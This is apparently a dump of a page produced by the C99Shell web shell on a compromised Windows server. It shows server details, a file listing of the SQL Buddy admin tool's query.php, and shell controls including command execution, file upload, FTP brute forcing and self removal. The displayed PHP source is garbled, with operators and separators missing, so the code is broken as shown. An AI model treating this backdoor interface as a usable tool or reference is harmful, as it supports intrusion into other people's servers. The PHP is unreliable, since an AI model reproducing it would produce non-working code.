!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\boletinlegal\admin\report\sqlbuddy\   drwxrwxrwx
Free 1.15 GB of 239.26 GB (0.48%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     query.php (1.43 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*

SQL Buddy - Web based MySQL administration
http://www.sqlbuddy.com/

query.php
- query the database

MIT license

2008 Calvin Lough <http://calv.in>

*/

include "functions.php";

loginCheck();

if (isset(
$db))
    
$conn->selectDB($db);

if (isset(
$_POST['query']))
    
$query $_POST['query'];

echo 
'<div style="padding-left: 5px">';

if (isset(
$db)) {
    echo 
'<span style="color: rgb(135, 135, 135)">' sprintf(__("Run a query on the %s database"), $db) . '.</span>';
}

if (isset(
$query)) {
    
$displayQuery $query;
} else if (isset(
$db) && isset($table) && $conn->getAdapter() == "mysql") {
    
$displayQuery "SELECT * FROM `$table` LIMIT 100";
} else if (isset(
$db) && isset($table) && $conn->getAdapter() == "sqlite") {
    
$displayQuery "SELECT * FROM '$table' LIMIT 100";
}

?>

<form onsubmit="executeQuery(); return false;">
<table cellpadding="0" cellspacing="0" style="margin: 2px 0px">
<tr>
    <td>
    <textarea name="QUERY" id="QUERY"><?php
    
    
if (isset($displayQuery))
        echo 
htmlentities($displayQueryENT_QUOTES'UTF-8');
    
    
?></textarea>
    </td>
    <td valign="bottom" style="padding-left: 7px">
    <input type="submit" class="inputbutton" value="<?php echo __("Submit"); ?>" />
    </td>
</tr>
</table>
</form>

</div>

<?php

if (isset($query)) {
    
    echo 
'<div style="margin-top: 10px">';
    
    require 
"includes/browse.php";
    
    echo 
'</div>';
}

?>
<script type="text/javascript" authkey="<?php echo $requestKey?>">

$('QUERY').focus();

</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--